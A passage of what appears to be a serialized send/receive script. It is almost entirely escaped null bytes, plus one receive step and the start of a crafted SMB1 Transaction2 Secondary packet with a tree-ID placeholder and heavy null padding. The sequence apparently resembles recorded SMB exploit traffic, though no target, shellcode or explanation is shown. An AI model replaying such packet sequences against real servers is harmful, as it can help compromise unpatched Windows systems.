\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('send', 1, b'\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x03\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x0